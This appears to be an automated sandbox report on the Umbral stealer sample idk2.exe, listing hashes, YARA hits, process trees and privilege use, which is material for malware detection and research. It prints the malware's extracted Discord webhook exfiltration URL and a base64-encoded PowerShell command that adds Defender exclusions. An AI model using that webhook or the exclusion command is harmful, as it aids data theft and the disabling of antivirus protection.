Analysis
-
max time kernel
117s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12-02-2024 02:01
Static task
static1
Behavioral task
behavioral1
Sample
idk2.exe
Resource
win7-20231215-en
General
-
Target
idk2.exe
-
Size
235KB
-
MD5
de1f5092e62d04690fb1d954f8540116
-
SHA1
959c0ee9355335d66fa5939dda6d452be32a8a06
-
SHA256
f36f29328d18f9d764b1a9e1e278750d21164ae1c1a25307d018a8e4e17c7c08
-
SHA512
2f438cffea72ebb9b089bfba476f4606a92667c154b31c2a6c4153a5ea4aa61620571a4db36a7ed5dffd71cd6edc9250157238b0e8b3a5a53fd27952dd3c2fa6
-
SSDEEP
6144:qbjntB9rSX4wXTAOU5Mj1af2FUD8bTc5Niydt8k1Mwce6yoN:qbjn1WowBTbTcLFHd1Mwz6t
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1204944287041847307/aoa_S28cr8V4g11xswAZC9SdvRJS8ygczDK-GfItmMFXCcL2edroJI5lraSE-OISlf6d
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000012262-2.dat family_umbral behavioral1/memory/2404-8-0x0000000000D10000-0x0000000000D50000-memory.dmp family_umbral -
Executes dropped EXE 1 IoCs
pid Process 2404 Umbral.exe -
Loads dropped DLL 1 IoCs
pid Process 3056 idk2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 2052 powershell.exe Token: SeDebugPrivilege 2404 Umbral.exe Token: SeIncreaseQuotaPrivilege 2364 wmic.exe Token: SeSecurityPrivilege 2364 wmic.exe Token: SeTakeOwnershipPrivilege 2364 wmic.exe Token: SeLoadDriverPrivilege 2364 wmic.exe Token: SeSystemProfilePrivilege 2364 wmic.exe Token: SeSystemtimePrivilege 2364 wmic.exe Token: SeProfSingleProcessPrivilege 2364 wmic.exe Token: SeIncBasePriorityPrivilege 2364 wmic.exe Token: SeCreatePagefilePrivilege 2364 wmic.exe Token: SeBackupPrivilege 2364 wmic.exe Token: SeRestorePrivilege 2364 wmic.exe Token: SeShutdownPrivilege 2364 wmic.exe Token: SeDebugPrivilege 2364 wmic.exe Token: SeSystemEnvironmentPrivilege 2364 wmic.exe Token: SeRemoteShutdownPrivilege 2364 wmic.exe Token: SeUndockPrivilege 2364 wmic.exe Token: SeManageVolumePrivilege 2364 wmic.exe Token: 33 2364 wmic.exe Token: 34 2364 wmic.exe Token: 35 2364 wmic.exe Token: SeIncreaseQuotaPrivilege 2364 wmic.exe Token: SeSecurityPrivilege 2364 wmic.exe Token: SeTakeOwnershipPrivilege 2364 wmic.exe Token: SeLoadDriverPrivilege 2364 wmic.exe Token: SeSystemProfilePrivilege 2364 wmic.exe Token: SeSystemtimePrivilege 2364 wmic.exe Token: SeProfSingleProcessPrivilege 2364 wmic.exe Token: SeIncBasePriorityPrivilege 2364 wmic.exe Token: SeCreatePagefilePrivilege 2364 wmic.exe Token: SeBackupPrivilege 2364 wmic.exe Token: SeRestorePrivilege 2364 wmic.exe Token: SeShutdownPrivilege 2364 wmic.exe Token: SeDebugPrivilege 2364 wmic.exe Token: SeSystemEnvironmentPrivilege 2364 wmic.exe Token: SeRemoteShutdownPrivilege 2364 wmic.exe Token: SeUndockPrivilege 2364 wmic.exe Token: SeManageVolumePrivilege 2364 wmic.exe Token: 33 2364 wmic.exe Token: 34 2364 wmic.exe Token: 35 2364 wmic.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 3056 wrote to memory of 2052 3056 idk2.exe 28 PID 3056 wrote to memory of 2052 3056 idk2.exe 28 PID 3056 wrote to memory of 2052 3056 idk2.exe 28 PID 3056 wrote to memory of 2052 3056 idk2.exe 28 PID 3056 wrote to memory of 2404 3056 idk2.exe 30 PID 3056 wrote to memory of 2404 3056 idk2.exe 30 PID 3056 wrote to memory of 2404 3056 idk2.exe 30 PID 3056 wrote to memory of 2404 3056 idk2.exe 30 PID 2404 wrote to memory of 2364 2404 Umbral.exe 31 PID 2404 wrote to memory of 2364 2404 Umbral.exe 31 PID 2404 wrote to memory of 2364 2404 Umbral.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\idk2.exe"C:\Users\Admin\AppData\Local\Temp\idk2.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcABnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAZABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AcgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZgBpACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230KB
MD5c8b5184d9b887d92ab00e72ecb7ec278
SHA1eb54b2c391556183c63877a988df43633961aa87
SHA256e1c82e170147a3acbb3fb9cc57bea7d25e0ce2d9c570994ac5a027819c9d5b9f
SHA5122c2a52c97579efc2df50063bb80280de04fb3e52b1cf20b089f71cb1746e66867dfbbf44e2357c1ce20e3b10b933da4b811cae34052ac4ce95d90419a45e38a9